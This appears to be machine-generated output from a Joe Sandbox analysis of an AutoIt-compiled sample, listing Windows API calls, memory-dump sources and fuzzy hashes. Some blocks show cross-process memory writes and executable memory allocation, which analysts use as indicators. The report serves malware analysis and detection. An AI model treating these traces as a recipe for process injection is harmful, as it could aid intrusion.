                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                      • Instruction ID: 83dc79de8007909d5e921ad974e8adde93957ea3d9e258e509ed9693f2b59d68
                                                                      • Opcode Fuzzy Hash: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                      • Instruction Fuzzy Hash: 9E212831B0420C6BDB20AE609C89FFE3BADEF49760F044029FA44DB191D6B58D44A791
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 01015A6E
                                                                      • GetForegroundWindow.USER32 ref: 01015A85
                                                                      • GetDC.USER32(00000000), ref: 01015AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 01015ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 01015B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                      • Instruction ID: 07a2bd0286adcd8dc83758cfbc6c8fde50c4326746d8a50ca2b34c1ff94081aa
                                                                      • Opcode Fuzzy Hash: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                      • Instruction Fuzzy Hash: 9321A176A00204AFD720EF64DC88A9ABBF5FF89350F148079E889D7355CA78ED00DB90
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                      • BeginPath.GDI32(?), ref: 00FA1373
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                      • Instruction ID: 0e7f769080a3d4f7e4b2e1e5cac70e15d09b10ec3db4eb99a3307eb6288fc7e1
                                                                      • Opcode Fuzzy Hash: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                      • Instruction Fuzzy Hash: 81215E71800309EFDF218F25DC4476D7BA8FB053A1F258216F890A69A4D77A9891EF90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 924fdfa53bb8811580b6aaf87bad3efb38b05b6562db186cdf04285ad6e8d851
                                                                      • Instruction ID: 13d7e091a19618ecbb322c7e269e11eb9f6216415c78340446abb16bcd22e096
                                                                      • Opcode Fuzzy Hash: 924fdfa53bb8811580b6aaf87bad3efb38b05b6562db186cdf04285ad6e8d851
                                                                      • Instruction Fuzzy Hash: CF0179B260010E7BE608AA12DD43FBB775CEE52798F044019FE0597313EB55DE15A2A1
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 01004ABA
                                                                      • __beginthreadex.LIBCMT ref: 01004AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 01004AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01004B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01004B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                      • Instruction ID: b7668618b6fa14e41339889a80eeb907bdd88daa4a202dcdf582359f2b691961
                                                                      • Opcode Fuzzy Hash: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                      • Instruction Fuzzy Hash: FC112B76904206BBE7319FBCDC08B9F7FBCEB46364F244259F954D3294D67A890487A0
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                      • GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                      • Instruction ID: 0c7b7cbaf7b0c46a37c0d7f8af8d275fa671ac9e9e7effa61fbfa81087841eb5
                                                                      • Opcode Fuzzy Hash: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                      • Instruction Fuzzy Hash: 7D016D71600209BFDB305FA5DC48D6B7BBCEF8A7A4B600429F949C2220DB329C01DB60
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                      • Instruction ID: e89ead9ae55496c3e5bd64be6e58260289b4b2ba79be9a0792a471673eb4ef7e
                                                                      • Opcode Fuzzy Hash: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                      • Instruction Fuzzy Hash: 3D01D472A00319BBCB205F24DC44BAAFBBCEF44BA1F2000A4FE44D2224D776DD01A7A0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0100526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01005280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                      • Instruction ID: d5a2af1e7cb9c9f741365accf5e54bf344affb8812d84a189f9999e58624aa3f
                                                                      • Opcode Fuzzy Hash: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                      • Instruction Fuzzy Hash: AF015735D0161EDBEF21EFE4EC48AEDBB78FF0A711F500086E981B2284CB3955508BA1
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FFC1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FFC20E
                                                                      • MessageBeep.USER32(00000000), ref: 00FFC226
                                                                      • KillTimer.USER32(?,0000040A), ref: 00FFC242
                                                                      • EndDialog.USER32(?,00000001), ref: 00FFC25C
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00FA13BF
                                                                      • StrokeAndFillPath.GDI32(?,?,00FDB888,00000000,?), ref: 00FA13DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA13EE
                                                                      • DeleteObject.GDI32 ref: 00FA1401
                                                                      • StrokePath.GDI32(?), ref: 00FA141C
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FA7A51: _memmove.LIBCMT ref: 00FA7AAB
                                                                      • __swprintf.LIBCMT ref: 00FB2ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FB2D66
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 1943609520-557222456
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                      • CoInitialize.OLE32(00000000), ref: 0100B9BB
                                                                      • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100B9D4
                                                                      • CoUninitialize.OLE32 ref: 0100B9F1
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      • API String ID: 2126378814-24824748
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FC50AD
                                                                        • Part of subcall function 00FD00F0: __87except.LIBCMT ref: 00FD012B
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: ERCP
                                                                      • API String ID: 2532777613-1384759551
                                                                      APIs
                                                                        • Part of subcall function 010014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF9296,?,?,00000034,00000800,?,00000034), ref: 010014E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FF983F
                                                                        • Part of subcall function 01001487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010014B1
                                                                        • Part of subcall function 010013DE: GetWindowThreadProcessId.USER32(?,?), ref: 01001409
                                                                        • Part of subcall function 010013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 01001419
                                                                        • Part of subcall function 010013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 0100142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98F9
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0102F910,00000000,?,?,?,?), ref: 010279DF
                                                                      • GetWindowLongW.USER32 ref: 010279FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01027A0C
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01027461
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01027475
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 01027499
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01027C4A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01027C58
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01027C5F
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                      • Instruction ID: d51fd40abb26563977aeea93914d013071f42468182f93707a77890499ce0bdf
                                                                      • Opcode Fuzzy Hash: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                      • Instruction Fuzzy Hash: A82181B5600119AFEB21DF28DCC1DA737EDEF5A394B540059FA819B351CB36EC118BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01026D3B
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01026D4B
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01026D70
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                      • Instruction ID: eb9da11f1dc0f71398f338c068e8fcbf963351acfb768fa69867e60adb7eec0b
                                                                      • Opcode Fuzzy Hash: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                      • Instruction Fuzzy Hash: 6521B332600128BFDF229F58DC44FBB3BBAEB89750F118128F9859B191C6729C5187A0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01027772
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01027787
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01027794
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                      • Instruction ID: adb2d854bb4a12a08a64d338643f7b4ad5454754d9c25135d086e10b2a838086
                                                                      • Opcode Fuzzy Hash: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                      • Instruction Fuzzy Hash: FB11E372240219BAEF205E65CC05FEB7BA9FF89B54F114528FA85A6090C672E411CB20
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B83,?), ref: 00FA4C44
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4C56
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                      • Instruction ID: cf4f60e89ee45b7e563f556ddde3797f991ecaa7305805c0be426c4fa5e1f080
                                                                      • Opcode Fuzzy Hash: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                      • Instruction Fuzzy Hash: 5CD01270951713CFD7305F32D91860676E8AF067A1B61882DD4E9DA114E6B4E880C751
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,01021039), ref: 01020DF5
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01020E07
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                      • Instruction ID: 6c18c41cf9db0c9690ce582a131a295fc6820e6b546708ec08fddcc3e4251d27
                                                                      • Opcode Fuzzy Hash: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                      • Instruction Fuzzy Hash: A0D01270510723CFD7705F75C408647B6E5AF05696F618C6DE9C6D6104D6B9D4E0C750
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4BD0,?,00FA4DEF,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4C11
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4C23
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                      • Instruction ID: 217c0d9e45c1a72ab11372653bd4df22dfc5fcdb5d751a492d4ffe7af58c6dae
                                                                      • Opcode Fuzzy Hash: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                      • Instruction Fuzzy Hash: 7BD01270911713CFD7306F71D918607B6E5EF0A6A1B618C2DD4CAD6210E6F4E880C750
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01018CF4,?,0102F910), ref: 010190EE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01019100
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                      • Instruction ID: d344fe2d0bb21b18cf41d7130511b99b58552d5bd1d6c624dae9a2a163a659f7
                                                                      • Opcode Fuzzy Hash: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                      • Instruction Fuzzy Hash: A2D01734510723CFDB309F36D82960776E5AF0A695B26C86EE9C6DA544E6B9C4C0CB90
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                      • Instruction ID: c1035e63a379a30d9dd3eea17c641b75235baaf833e4d02ec5c0cf4fa158fbe5
                                                                      • Opcode Fuzzy Hash: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                      • Instruction Fuzzy Hash: BED01273805159EAC7149A939889EBD777CB709741F500456F80692140E2358798F621
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                      • Instruction ID: 24c29dba4e7b54534e2858e599ac92212c670d4343658d54d763bdc098a2e496
                                                                      • Opcode Fuzzy Hash: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                      • Instruction Fuzzy Hash: A4C16C75A0421AEFCB14DF94C884EAEFBB5FF48710B148599E905EB261D730ED81EB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0101E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0101E101
                                                                        • Part of subcall function 0101D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0101E301
                                                                      • _memmove.LIBCMT ref: 0101E314
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
